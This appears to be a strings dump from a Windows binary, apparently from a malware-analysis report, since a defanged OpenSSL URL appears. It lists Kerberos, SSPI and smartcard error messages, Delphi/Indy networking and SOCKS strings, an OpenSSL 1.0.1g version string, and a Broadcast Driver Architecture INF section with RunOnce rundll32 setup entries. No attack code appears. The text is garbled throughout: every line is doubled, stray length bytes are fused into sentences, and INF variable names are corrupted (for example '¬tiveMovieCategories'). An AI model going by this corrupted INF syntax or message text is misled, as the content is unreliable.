5The certificate is not valid for the requested usage.
5The certificate is not valid for the requested usage.
The smartcard certificate used for authentication has been revoked. Please contact your system administrator. There may be additional information in the event log.
The smartcard certificate used for authentication has been revoked. Please contact your system administrator. There may be additional information in the event log.
An untrusted certificate authority was detected While processing the smartcard certificate used for authentication. Please contact your system administrator.
An untrusted certificate authority was detected While processing the smartcard certificate used for authentication. Please contact your system administrator.
The revocation status of the smartcard certificate used for authentication could not be determined. Please contact your system administrator.lThe smartcard certificate used for authentication was not trusted. Please contact your system administrator.hThe smartcard certificate used for authentication has expired. Please contact your system administrator.
The revocation status of the smartcard certificate used for authentication could not be determined. Please contact your system administrator.lThe smartcard certificate used for authentication was not trusted. Please contact your system administrator.hThe smartcard certificate used for authentication has expired. Please contact your system administrator.
The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.
The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.
An attempt was made by this server to make a Kerberos constrained delegation request for a target outside of the server's realm. This is not supported, and indicates a misconfiguration on this server's allowed to delegate to list. Please contact your administrator.
An attempt was made by this server to make a Kerberos constrained delegation request for a target outside of the server's realm. This is not supported, and indicates a misconfiguration on this server's allowed to delegate to list. Please contact your administrator.
The revocation status of the domain controller certificate used for smartcard authentication could not be determined. There is additional information in the system event log. Please contact your system administrator.
The revocation status of the domain controller certificate used for smartcard authentication could not be determined. There is additional information in the system event log. Please contact your system administrator.
An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Please contact your system administrator.
An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Please contact your system administrator.
The domain controller certificate used for smartcard logon has expired. Please contact your system administrator with the contents of your system event log.
The domain controller certificate used for smartcard logon has expired. Please contact your system administrator with the contents of your system event log.
The domain controller certificate used for smartcard logon has been revoked. Please contact your system administrator with the contents of your system event log.IA signature operation must be performed before the user can authenticate.AOne or more of the parameters passed to the function was invalid.DClient policy does not allow credential delegation to target server.
The domain controller certificate used for smartcard logon has been revoked. Please contact your system administrator with the contents of your system event log.IA signature operation must be performed before the user can authenticate.AOne or more of the parameters passed to the function was invalid.DClient policy does not allow credential delegation to target server.
9The number of maximum ticket referrals has been exceeded.KThe local machine must be a Kerberos KDC (domain controller) and it is not.qThe other end of the security negotiation is requires strong crypto but it is not supported on the local machine.5The KDC reply contained more than one principal name.OExpected to find PA data for a hint of what etype to use, but it was not found.
9The number of maximum ticket referrals has been exceeded.KThe local machine must be a Kerberos KDC (domain controller) and it is not.qThe other end of the security negotiation is requires strong crypto but it is not supported on the local machine.5The KDC reply contained more than one principal name.OExpected to find PA data for a hint of what etype to use, but it was not found.
The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Please contact your administrator.-Smartcard logon is required and was not used.!A system shutdown is in progress.'An invalid request was sent to the KDC.DThe KDC was unable to generate a referral for the service requested.:The encryption type requested is not supported by the KDC.QAn unsupported preauthentication mechanism was presented to the Kerberos package.
The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Please contact your administrator.-Smartcard logon is required and was not used.!A system shutdown is in progress.'An invalid request was sent to the KDC.DThe KDC was unable to generate a referral for the service requested.:The encryption type requested is not supported by the KDC.QAn unsupported preauthentication mechanism was presented to the Kerberos package.
The requested operation cannot be completed. The computer must be trusted for delegation and the current user account must be configured to allow delegation.7Client's supplied SSPI channel bindings were incorrect.9The received certificate was mapped to multiple accounts.
The requested operation cannot be completed. The computer must be trusted for delegation and the current user account must be configured to allow delegation.7Client's supplied SSPI channel bindings were incorrect.9The received certificate was mapped to multiple accounts.
SEC_E_NO_KERB_KEY
SEC_E_NO_KERB_KEY
'The target principal name is incorrect.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.
'The target principal name is incorrect.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.
The security context could not be established due to a failure in the requested quality of service (e.g. mutual authentication or delegation).dA security context was deleted before the context was completed. This is considered a logon failure.mThe client is trying to negotiate a context and the server requires user-to-user but didn't send a TGT reply.aUnable to accomplish the requested task because the local machine does not have any IP addresses.bThe supplied credential handle does not match the credential associated with the security context.]The crypto system or checksum function is invalid because a required function is unavailable.
The security context could not be established due to a failure in the requested quality of service (e.g. mutual authentication or delegation).dA security context was deleted before the context was completed. This is considered a logon failure.mThe client is trying to negotiate a context and the server requires user-to-user but didn't send a TGT reply.aUnable to accomplish the requested task because the local machine does not have any IP addresses.bThe supplied credential handle does not match the credential associated with the security context.]The crypto system or checksum function is invalid because a required function is unavailable.
;The credentials supplied to the package were not recognized4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.
;The credentials supplied to the package were not recognized4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.
The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client
The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client
Failed to load %s.
Failed to load %s.
SSL status: "%s"
SSL status: "%s"
%s Alert
%s Alert
%s Read Alert
%s Read Alert
%s Write Alert
%s Write Alert
Error creating SSL context. Could not load root certificate.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Could not load certificate.#Could not load key, check password.
Host field is empty,Character Index %d out of Range, Length = %d:Character at Index %d is not a valid UTF-16 High Surrogate9Character at Index %d is not a valid UTF-16 Low Surrogate
Host field is empty,Character Index %d out of Range, Length = %d:Character at Index %d is not a valid UTF-16 High Surrogate9Character at Index %d is not a valid UTF-16 Low Surrogate
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s
Reply Code is not valid: %s
Reply Code already exists: %s
Reply Code already exists: %s
IOHandler value is not valid'Algorithm %s not permitted in FIPS mode
IOHandler value is not valid'Algorithm %s not permitted in FIPS mode
Unknown Protocol(Request method requires HTTP version 1.1KUnsupported hash algorithm. This implementation supports only MD5 encoding.$Error accepting connection with SSL.
Unknown Protocol(Request method requires HTTP version 1.1KUnsupported hash algorithm. This implementation supports only MD5 encoding.$Error accepting connection with SSL.
Address type not supported."%s: Circular links are not allowed"Not enough data in buffer. (%d/%d)
Address type not supported."%s: Circular links are not allowed"Not enough data in buffer. (%d/%d)
File "%s" not found
File "%s" not found
Object type not supported.
Object type not supported.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Command not supported.
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
Invalid Port Range (%d - %d)
%s is not a valid service.
%s is not a valid service.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation would block.
Operation now in progress.
Operation now in progress.
Operation already in progress.
Operation already in progress.
Socket operation on non-socket.
Socket operation on non-socket.
Protocol not supported.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Protocol family not supported.0Address family not supported by protocol family.
Invalid destination index (%d)
Invalid destination index (%d)
Invalid codepage (%d)4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Invalid codepage (%d)4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Resolving hostname %s.
Connecting to %s.
Connecting to %s.
Socket Error # %d
Socket Error # %d
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group
%s expected$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Invalid destination array"Character index out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Invalid count (%d)
Invalid count (%d)
Invalid property type: %s
Invalid property type: %s
Invalid data type for '%s'
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
Line too long List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
%s on line %d
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to create key %s
Failed to create key %s
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid property element: %s
Invalid property element: %s
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
%s (%s, line %d)
%s (%s, line %d)
Operation aborted(Exception %s in module %s at %p.
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
!'%s' is not a valid integer value('%s' is not a valid floating point value
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid GUID value
'%s' is not a valid GUID value
I/O error %d
I/O error %d
The OpenSSL Project, hXXp://VVV.openssl.org/
The OpenSSL Project, hXXp://VVV.openssl.org/
1.0.1g
1.0.1g
ClassGUID={4d36e96c-e325-11ce-bfc1-08002be10318}
ClassGUID={4d36e96c-e325-11ce-bfc1-08002be10318}
LayoutFile=layout.inf
LayoutFile=layout.inf
DriverVer=07/01/2001,5.1.2535.0
DriverVer=07/01/2001,5.1.2535.0
Include=ks.inf
Include=ks.inf
Needs=KS.Registration
Needs=KS.Registration
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation
RegisterDlls=BDA.RegisterDlls
RegisterDlls=BDA.RegisterDlls
CopyFiles=BdaPlugIn.Files, BdaFilter.Files, BdaDriver.Files
CopyFiles=BdaPlugIn.Files, BdaFilter.Files, BdaDriver.Files
[DefaultInstall.NT]
[DefaultInstall.NT]
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation.NT
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation.NT
BdaFilter.Files=11
BdaFilter.Files=11
BdaPlugIn.Files=11
BdaPlugIn.Files=11
AllDll.Files=11
AllDll.Files=11
BdaDriver.Files=10,system32\drivers
BdaDriver.Files=10,system32\drivers
AllDriver.Files=10,system32\drivers
AllDriver.Files=10,system32\drivers
[BDA.Registration]
[BDA.Registration]
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration
[BDA.Installation]
[BDA.Installation]
[BDA.Installation.NT]
[BDA.Installation.NT]
[BDA.CategoryRegistration]
[BDA.CategoryRegistration]
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,FriendlyName,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,FriendlyName,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,CLSID,,%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,CLSID,,%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,FriendlyName,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,FriendlyName,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,CLSID,,%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,CLSID,,%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,Merit,1,00,00,60,00
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,Merit,1,00,00,60,00
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,FriendlyName,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,FriendlyName,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,CLSID,,"%GUID.BdaRenderer%"
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,CLSID,,"%GUID.BdaRenderer%"
[BDA.NodeRegistration]
[BDA.NodeRegistration]
; HKLM,%MediaCategories%\%GUID.Bridge%,Name,,%Node.Bridge%
; HKLM,%MediaCategories%\%GUID.Bridge%,Name,,%Node.Bridge%
; HKLM,%MediaCategories%\%GUID.Bridge%,Display,1,00,00,00,00
; HKLM,%MediaCategories%\%GUID.Bridge%,Display,1,00,00,00,00
[BDA.PinNameRegistration]
[BDA.PinNameRegistration]
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Name,,%Pin.Name.AtscTS%
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Name,,%Pin.Name.AtscTS%
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Name,,%Pin.Name.IPV4%
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Name,,%Pin.Name.IPV4%
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Name,,%Pin.Name.MPE%
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Name,,%Pin.Name.MPE%
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Name,,%Pin.Name.NABTS%
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Name,,%Pin.Name.NABTS%
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Display,1,00,00,00,00
[BDA.DeviceInstallation]
[BDA.DeviceInstallation]
HKLM,%RunOnce%,"MPE0",,"rundll32.exe streamci,StreamingDeviceSetup %MPE.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\mpe.inf,BDAcodec"
HKLM,%RunOnce%,"MPE0",,"rundll32.exe streamci,StreamingDeviceSetup %MPE.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\mpe.inf,BDAcodec"
HKLM,%RunOnce%,"STREAMIP0",,"rundll32.exe streamci,StreamingDeviceSetup %StreamIP.DeviceId%,GLOBAL,%GUID.BdaRenderer%,%\streamip.inf,BDAcodec"
HKLM,%RunOnce%,"STREAMIP0",,"rundll32.exe streamci,StreamingDeviceSetup %StreamIP.DeviceId%,GLOBAL,%GUID.BdaRenderer%,%\streamip.inf,BDAcodec"
HKLM,%RunOnce%,"SLIP0",,"rundll32.exe streamci,StreamingDeviceSetup %Slip.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\slip.inf,VBIcodec"
HKLM,%RunOnce%,"SLIP0",,"rundll32.exe streamci,StreamingDeviceSetup %Slip.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\slip.inf,VBIcodec"
HKLM,%RunOnce%,"CCDECODE0",,"rundll32.exe streamci,StreamingDeviceSetup ÌDecode.DeviceId%,GLOBAL,%VBIcatID%,%\CCDECODE.inf,CCDECODE.Interface.Install"
HKLM,%RunOnce%,"CCDECODE0",,"rundll32.exe streamci,StreamingDeviceSetup ÌDecode.DeviceId%,GLOBAL,%VBIcatID%,%\CCDECODE.inf,CCDECODE.Interface.Install"
HKLM,%RunOnce%,"NABTSFEC0",,"rundll32.exe streamci,StreamingDeviceSetup %NabtsFEC.DeviceID%,GLOBAL,%VBIcatID%,%\NABTSFEC.inf,NABTSFEC.Interface.Install"
HKLM,%RunOnce%,"NABTSFEC0",,"rundll32.exe streamci,StreamingDeviceSetup %NabtsFEC.DeviceID%,GLOBAL,%VBIcatID%,%\NABTSFEC.inf,NABTSFEC.Interface.Install"
HKLM,%RunOnce%,"WSTCODEC0",,"rundll32.exe streamci,StreamingDeviceSetup %WSTCodec.DeviceId%,GLOBAL,%VBIcatID%,%\WSTCODEC.inf,WSTCODEC.Interface.Install"
HKLM,%RunOnce%,"WSTCODEC0",,"rundll32.exe streamci,StreamingDeviceSetup %WSTCodec.DeviceId%,GLOBAL,%VBIcatID%,%\WSTCODEC.inf,WSTCODEC.Interface.Install"
[NdisIP.Installation]
[NdisIP.Installation]
[NdisIP.Installation.NT]
[NdisIP.Installation.NT]
HKLM,%RunOnce%,"NDISIP0",,"rundll32.exe streamci,StreamingDeviceSetup %NdisIP.DeviceId%,NDISIP,%NdisIP.GUID.BDANetInterface%,%\ndisip.inf,NdisIP.Reg"
HKLM,%RunOnce%,"NDISIP0",,"rundll32.exe streamci,StreamingDeviceSetup %NdisIP.DeviceId%,NDISIP,%NdisIP.GUID.BDANetInterface%,%\ndisip.inf,NdisIP.Reg"
[BDA.FilterRegistration]
[BDA.FilterRegistration]
HKLM,%PsisDecd.Reg%,"VendorID",1,31,11,00,00
HKLM,%PsisDecd.Reg%,"VendorID",1,31,11,00,00
HKLM,%PsisDecd.Reg%,"AdapterID",1,46,71,00,00
HKLM,%PsisDecd.Reg%,"AdapterID",1,46,71,00,00
HKLM,%PsisDecd.Reg%,"ChannelNumber",1,0a,00,00,00
HKLM,%PsisDecd.Reg%,"ChannelNumber",1,0a,00,00,00
HKLM,%PsisDecd.Reg%,"MaxChannelNumber",1,44,00,00,00
HKLM,%PsisDecd.Reg%,"MaxChannelNumber",1,44,00,00,00
HKLM,%PsisDecd.Reg%,"AtscNetwork",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"AtscNetwork",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"EnableAtsc_PSIP",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"EnableAtsc_PSIP",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"DvbNetwork",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"DvbNetwork",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"EnableDVB_SI",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"EnableDVB_SI",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"EnableNetwkProvider",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"EnableNetwkProvider",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"GraphFile",,"\\psistest.grf"
HKLM,%PsisDecd.Reg%,"GraphFile",,"\\psistest.grf"
[BDA.RegisterDlls]
[BDA.RegisterDlls]
11,,BdaPlgin.ax,1
11,,BdaPlgin.ax,1
11,,MsDvbNp.ax,1
11,,MsDvbNp.ax,1
11,,Mpeg2Data.ax,1
11,,Mpeg2Data.ax,1
11,,PsisRndr.ax,1
11,,PsisRndr.ax,1
11,,PsisDecd.dll,1
11,,PsisDecd.dll,1
[BDA.PluginRegistration]
[BDA.PluginRegistration]
HKCR,CLSID\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,ThreadingModel,,Both
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKCR,CLSID\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,ThreadingModel,,Both
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKCR,CLSID\%GUID.BdaCAControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaCAControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,,,CaPlgin.ax
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,,,CaPlgin.ax
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,ThreadingModel,,Both
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,,,%PlugIn_BdaCA%
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,,,%PlugIn_BdaCA%
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
[BdaDriver.Files]
[BdaDriver.Files]
BdaSup.sys,,,COPYFLG_NO_VERSION_DIALOG
BdaSup.sys,,,COPYFLG_NO_VERSION_DIALOG
[BdaFilter.Files]
[BdaFilter.Files]
MSDvbNP.ax,,,COPYFLG_NO_VERSION_DIALOG
MSDvbNP.ax,,,COPYFLG_NO_VERSION_DIALOG
PsisRndr.ax,,,COPYFLG_NO_VERSION_DIALOG
PsisRndr.ax,,,COPYFLG_NO_VERSION_DIALOG
PsisDecd.dll,,,COPYFLG_NO_VERSION_DIALOG
PsisDecd.dll,,,COPYFLG_NO_VERSION_DIALOG
[BdaPlugIn.Files]
[BdaPlugIn.Files]
BdaPlgIn.ax,,,COPYFLG_NO_VERSION_DIALOG
BdaPlgIn.ax,,,COPYFLG_NO_VERSION_DIALOG
; Bda.TXT is appended here
; Bda.TXT is appended here
RunOnce="SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
RunOnce="SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
ActiveMovieCategories="CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance"
ActiveMovieCategories="CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance"
PsisDecd.Reg="SOFTWARE\Intel\PSIS\PSIS_DECODER"
PsisDecd.Reg="SOFTWARE\Intel\PSIS\PSIS_DECODER"
; Note that some category GUIDs are defined in ks.inf
; Note that some category GUIDs are defined in ks.inf
VBIcatID="{07DAD660-22F1-11d1-A9F4-00C04FBBDE8F}"
VBIcatID="{07DAD660-22F1-11d1-A9F4-00C04FBBDE8F}"
GUID.BdaTuner="{71985F48-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaTuner="{71985F48-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaComponent="{FD0A5AF4-B41D-11d2-9C95-00C04F7971E0}"
GUID.BdaComponent="{FD0A5AF4-B41D-11d2-9C95-00C04F7971E0}"
